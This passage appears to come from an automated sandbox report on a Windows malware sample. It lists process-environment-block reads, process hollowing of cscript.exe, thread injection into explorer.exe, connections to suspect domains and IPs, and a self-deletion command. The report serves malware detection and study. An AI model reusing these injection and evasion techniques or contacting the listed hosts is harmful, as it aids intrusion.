          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CB8D0 mov eax, dword ptr fs:[00000030h]10_2_047CB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476F0BF mov ecx, dword ptr fs:[00000030h]10_2_0476F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]10_2_0476F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476F0BF mov eax, dword ptr fs:[00000030h]10_2_0476F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047620A0 mov eax, dword ptr fs:[00000030h]10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047790AF mov eax, dword ptr fs:[00000030h]10_2_047790AF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474849B mov eax, dword ptr fs:[00000030h]10_2_0474849B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739080 mov eax, dword ptr fs:[00000030h]10_2_04739080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04801074 mov eax, dword ptr fs:[00000030h]10_2_04801074
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]10_2_047B3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B3884 mov eax, dword ptr fs:[00000030h]10_2_047B3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]10_2_0473B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B171 mov eax, dword ptr fs:[00000030h]10_2_0473B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]10_2_0475C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475C577 mov eax, dword ptr fs:[00000030h]10_2_0475C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C962 mov eax, dword ptr fs:[00000030h]10_2_0473C962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04757D50 mov eax, dword ptr fs:[00000030h]10_2_04757D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]10_2_048005AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_048005AC mov eax, dword ptr fs:[00000030h]10_2_048005AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]10_2_0475B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475B944 mov eax, dword ptr fs:[00000030h]10_2_0475B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04773D43 mov eax, dword ptr fs:[00000030h]10_2_04773D43
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B3540 mov eax, dword ptr fs:[00000030h]10_2_047B3540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04743D34 mov eax, dword ptr fs:[00000030h]10_2_04743D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473AD30 mov eax, dword ptr fs:[00000030h]10_2_0473AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FE539 mov eax, dword ptr fs:[00000030h]10_2_047FE539
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]10_2_0476513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476513A mov eax, dword ptr fs:[00000030h]10_2_0476513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047BA537 mov eax, dword ptr fs:[00000030h]10_2_047BA537
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]10_2_04764D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]10_2_04764D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04764D3B mov eax, dword ptr fs:[00000030h]10_2_04764D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov eax, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04754120 mov ecx, dword ptr fs:[00000030h]10_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]10_2_04739100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]10_2_04739100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739100 mov eax, dword ptr fs:[00000030h]10_2_04739100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047E8DF1 mov eax, dword ptr fs:[00000030h]10_2_047E8DF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]10_2_0473B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]10_2_0473B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473B1E1 mov eax, dword ptr fs:[00000030h]10_2_0473B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C41E8 mov eax, dword ptr fs:[00000030h]10_2_047C41E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]10_2_0474D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474D5E0 mov eax, dword ptr fs:[00000030h]10_2_0474D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FFDE2 mov eax, dword ptr fs:[00000030h]10_2_047FFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B6DC9 mov eax, dword ptr fs:[00000030h]10_2_047B6DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808D34 mov eax, dword ptr fs:[00000030h]10_2_04808D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04761DB5 mov eax, dword ptr fs:[00000030h]10_2_04761DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B51BE mov eax, dword ptr fs:[00000030h]10_2_047B51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]10_2_047661A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047661A0 mov eax, dword ptr fs:[00000030h]10_2_047661A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047635A1 mov eax, dword ptr fs:[00000030h]10_2_047635A1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B69A6 mov eax, dword ptr fs:[00000030h]10_2_047B69A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762990 mov eax, dword ptr fs:[00000030h]10_2_04762990
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]10_2_0476FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476FD9B mov eax, dword ptr fs:[00000030h]10_2_0476FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A185 mov eax, dword ptr fs:[00000030h]10_2_0476A185
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475C182 mov eax, dword ptr fs:[00000030h]10_2_0475C182
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762581 mov eax, dword ptr fs:[00000030h]10_2_04762581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04732D8A mov eax, dword ptr fs:[00000030h]10_2_04732D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475AE73 mov eax, dword ptr fs:[00000030h]10_2_0475AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477927A mov eax, dword ptr fs:[00000030h]10_2_0477927A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474766D mov eax, dword ptr fs:[00000030h]10_2_0474766D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]10_2_047EB260
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EB260 mov eax, dword ptr fs:[00000030h]10_2_047EB260
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04800EA5 mov eax, dword ptr fs:[00000030h]10_2_04800EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FEA55 mov eax, dword ptr fs:[00000030h]10_2_047FEA55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047C4257 mov eax, dword ptr fs:[00000030h]10_2_047C4257
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04739240 mov eax, dword ptr fs:[00000030h]10_2_04739240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04747E41 mov eax, dword ptr fs:[00000030h]10_2_04747E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]10_2_047FAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047FAE44 mov eax, dword ptr fs:[00000030h]10_2_047FAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EFE3F mov eax, dword ptr fs:[00000030h]10_2_047EFE3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473E620 mov eax, dword ptr fs:[00000030h]10_2_0473E620
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808ED6 mov eax, dword ptr fs:[00000030h]10_2_04808ED6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]10_2_04774A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04774A2C mov eax, dword ptr fs:[00000030h]10_2_04774A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov ecx, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04735210 mov eax, dword ptr fs:[00000030h]10_2_04735210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]10_2_0473AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473AA16 mov eax, dword ptr fs:[00000030h]10_2_0473AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04753A1C mov eax, dword ptr fs:[00000030h]10_2_04753A1C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]10_2_0476A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A61C mov eax, dword ptr fs:[00000030h]10_2_0476A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473C600 mov eax, dword ptr fs:[00000030h]10_2_0473C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04768E00 mov eax, dword ptr fs:[00000030h]10_2_04768E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F1608 mov eax, dword ptr fs:[00000030h]10_2_047F1608
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04748A0A mov eax, dword ptr fs:[00000030h]10_2_04748A0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762AE4 mov eax, dword ptr fs:[00000030h]10_2_04762AE4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047616E0 mov ecx, dword ptr fs:[00000030h]10_2_047616E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047476E2 mov eax, dword ptr fs:[00000030h]10_2_047476E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04778EC7 mov eax, dword ptr fs:[00000030h]10_2_04778EC7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047636CC mov eax, dword ptr fs:[00000030h]10_2_047636CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04762ACB mov eax, dword ptr fs:[00000030h]10_2_04762ACB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047EFEC0 mov eax, dword ptr fs:[00000030h]10_2_047EFEC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]10_2_0474AAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474AAB0 mov eax, dword ptr fs:[00000030h]10_2_0474AAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476FAB0 mov eax, dword ptr fs:[00000030h]10_2_0476FAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047352A5 mov eax, dword ptr fs:[00000030h]10_2_047352A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047B46A7 mov eax, dword ptr fs:[00000030h]10_2_047B46A7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]10_2_0476D294
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476D294 mov eax, dword ptr fs:[00000030h]10_2_0476D294
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04808A62 mov eax, dword ptr fs:[00000030h]10_2_04808A62
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CFE87 mov eax, dword ptr fs:[00000030h]10_2_047CFE87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]10_2_04763B7A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04763B7A mov eax, dword ptr fs:[00000030h]10_2_04763B7A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473DB60 mov ecx, dword ptr fs:[00000030h]10_2_0473DB60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474FF60 mov eax, dword ptr fs:[00000030h]10_2_0474FF60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04805BA5 mov eax, dword ptr fs:[00000030h]10_2_04805BA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473F358 mov eax, dword ptr fs:[00000030h]10_2_0473F358
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0473DB40 mov eax, dword ptr fs:[00000030h]10_2_0473DB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0474EF40 mov eax, dword ptr fs:[00000030h]10_2_0474EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476E730 mov eax, dword ptr fs:[00000030h]10_2_0476E730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]10_2_04734F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04734F2E mov eax, dword ptr fs:[00000030h]10_2_04734F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0475F716 mov eax, dword ptr fs:[00000030h]10_2_0475F716
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047F131B mov eax, dword ptr fs:[00000030h]10_2_047F131B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]10_2_047CFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047CFF10 mov eax, dword ptr fs:[00000030h]10_2_047CFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0476A70E mov eax, dword ptr fs:[00000030h]10_2_0476A70E
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00409B50 LdrLoadDll,5_2_00409B50
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.216.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rdoi.top
          Source: C:\Windows\explorer.exeNetwork Connect: 156.240.150.22 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.118.119.183 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.isshinn1.com
          Source: C:\Windows\explorer.exeDomain query: www.sosoon.store
          Source: C:\Windows\explorer.exeDomain query: www.24000words.com
          Source: C:\Windows\explorer.exeDomain query: www.creationslazzaroni.com
          Source: C:\Windows\explorer.exeDomain query: www.healthyweekendtips.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.93.101.51 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 157.7.107.193 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.passiverewardssystems.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.253 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.233.161.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.megacinema.club
          Source: C:\Windows\explorer.exeDomain query: www.thedusi.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 840000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'Jump to behavior
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000000.311724441.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.320927407.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Users\user\Desktop\CtTYTpaAKA.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
